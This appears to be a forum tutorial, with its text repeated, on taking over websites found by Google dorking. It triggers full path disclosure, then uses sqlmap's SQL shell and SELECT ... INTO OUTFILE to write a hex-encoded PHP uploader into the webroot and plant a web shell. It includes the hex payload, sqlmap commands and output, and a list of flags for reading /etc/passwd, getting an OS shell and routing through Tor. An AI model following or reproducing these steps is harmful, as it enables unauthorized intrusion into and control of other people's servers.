what you need:?
A php shell of your choosing
A php upload script http://www.w3schools.com/php/php_file_upload.asp
SQLmap sqlmap.org
What is a shell you ask?
"Shell is a shell wrapped in a script. It's a tool you can use to execute
arbitrary shell-commands or browse the filesystem on your remote
webserver. This replaces, to a degree, a normal telnet connection, and
to a lesser degree a SSH connection.
You use it for
administration and maintenance of your website, which is often much
easier to do if you can work directly on the server. For example, you
could use PHP Shell to unpack and move big files around. All the normal
command line programs like ps, free, du, df, etc can be used.
There
are some limitations on what kind of programs you can run. It won't do
no good if you start a graphical program like Firefox or even a console
based one like vi. All programs have to be strictly command line
programs, and they will have no chance of getting user input after they
have been launched.They probably also have to terminate within 30
seconds, as this is the default time-limit imposed unto all PHP scripts,
to prevent them from running in an infinite loop. Your ISP may have set
this time-limit to something else.
But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc"
1. After finding a site either by google dorking or other means you need to get full path disclosure. https://www.owasp.org/index.php/Full_Path_Disclosure
I will use the empty array exploit, add the brackets []
That should give you.
2. You`ll need to convert you script to hex you can do so here http://www.string-functions.com/string-hex.aspx
So you`ll have something like this...
Turn into this.
3. Now lets fire up sqlmap with a sql-shell and inject.
Let SQLmap do its magic and after a while you will get a SQL-shell.
Now write,
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
Don't forget the 0x before your hex, so it should look like.
After a few secs is should tell you if it worked or not.
4.Then browse to http://www.example.com/upload.php and upload the php shell.
5.Browse to your php shell by pathing and login. ALWAYS USE A PASSWORD ON YOUR SHELL.
Extra:
You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.
A
theory is that you can inject the full shellcode directly instead of
first writing the uploader, the problems is that this specific shell is
268kB but maybe with a smaller shell
sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:
-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote machine must be used with file-dest
--file-dest=/etc/passwd where to write the file-write
--os-shell like the sql-shell but system
--wizard for beginners
--check-waf Check for WAF/IPS/IDS protection
there are many more just check them out
The
--file-read/write does not work most of the times maybe im doing
something wrong thats why i use sql-shell to write files or do specific
commands.
--os-shell is awesome, you cant write php code to disk tho.
Hope you guys enjoyed.
A php shell of your choosing
A php upload script http://www.w3schools.com/php/php_file_upload.asp
SQLmap sqlmap.org
What is a shell you ask?
"Shell is a shell wrapped in a script. It's a tool you can use to execute
arbitrary shell-commands or browse the filesystem on your remote
webserver. This replaces, to a degree, a normal telnet connection, and
to a lesser degree a SSH connection.
You use it for
administration and maintenance of your website, which is often much
easier to do if you can work directly on the server. For example, you
could use PHP Shell to unpack and move big files around. All the normal
command line programs like ps, free, du, df, etc can be used.
There
are some limitations on what kind of programs you can run. It won't do
no good if you start a graphical program like Firefox or even a console
based one like vi. All programs have to be strictly command line
programs, and they will have no chance of getting user input after they
have been launched.They probably also have to terminate within 30
seconds, as this is the default time-limit imposed unto all PHP scripts,
to prevent them from running in an infinite loop. Your ISP may have set
this time-limit to something else.
But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc"
1. After finding a site either by google dorking or other means you need to get full path disclosure. https://www.owasp.org/index.php/Full_Path_Disclosure
I will use the empty array exploit, add the brackets []
Code:
http://www.example.com/index.php?id[]=1
Code:
Warning: mysql_fetch_array():
supplied argument is not a valid MySQL result resource in
/home/relax/public_html/index.php on line 592. You`ll need to convert you script to hex you can do so here http://www.string-functions.com/string-hex.aspx
So you`ll have something like this...
Code:
<form
enctype="multipart/form-data" action="upload.php"
method="POST"><input name="uploadedfile" type="file"/><input
type="submit" value="Upload File"/></form> <?php
$target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo
basename($_FILES['uploadedfile']['name'])." has been
uploaded";}else{echo "Error!";}?>Turn into this.
Code:
3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d64617461222061637469
6f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d
653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970
653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d
0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b277570
6c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66
696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c
247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b277570
6c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f616465
64223b7d656c73657b6563686f20224572726f7221223b7d3f3e3. Now lets fire up sqlmap with a sql-shell and inject.
Code:
python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shellLet SQLmap do its magic and after a while you will get a SQL-shell.
Code:
[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>Now write,
SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
Don't forget the 0x before your hex, so it should look like.
Code:
select
0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374
696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e61
6d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e707574207479
70653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e
0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775
706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f
66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d
2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775
706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f6164
6564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";After a few secs is should tell you if it worked or not.
4.Then browse to http://www.example.com/upload.php and upload the php shell.
5.Browse to your php shell by pathing and login. ALWAYS USE A PASSWORD ON YOUR SHELL.
Extra:
You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.
A
theory is that you can inject the full shellcode directly instead of
first writing the uploader, the problems is that this specific shell is
268kB but maybe with a smaller shell
sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:
-o optimization
--threads=1-10 nr of threads (faster)
--dbms=mysql backend dbms (faster)
--level=1-5 more-tests
--risk=1-3 more-tests
--tor-port=xxxx connect through tor
--random-agent random user agent
--file-read=/etc/passwd read local file
--file-write=/etc/passwd write file to remote machine must be used with file-dest
--file-dest=/etc/passwd where to write the file-write
--os-shell like the sql-shell but system
--wizard for beginners
--check-waf Check for WAF/IPS/IDS protection
there are many more just check them out
The
--file-read/write does not work most of the times maybe im doing
something wrong thats why i use sql-shell to write files or do specific
commands.
--os-shell is awesome, you cant write php code to disk tho.
Hope you guys enjoyed.
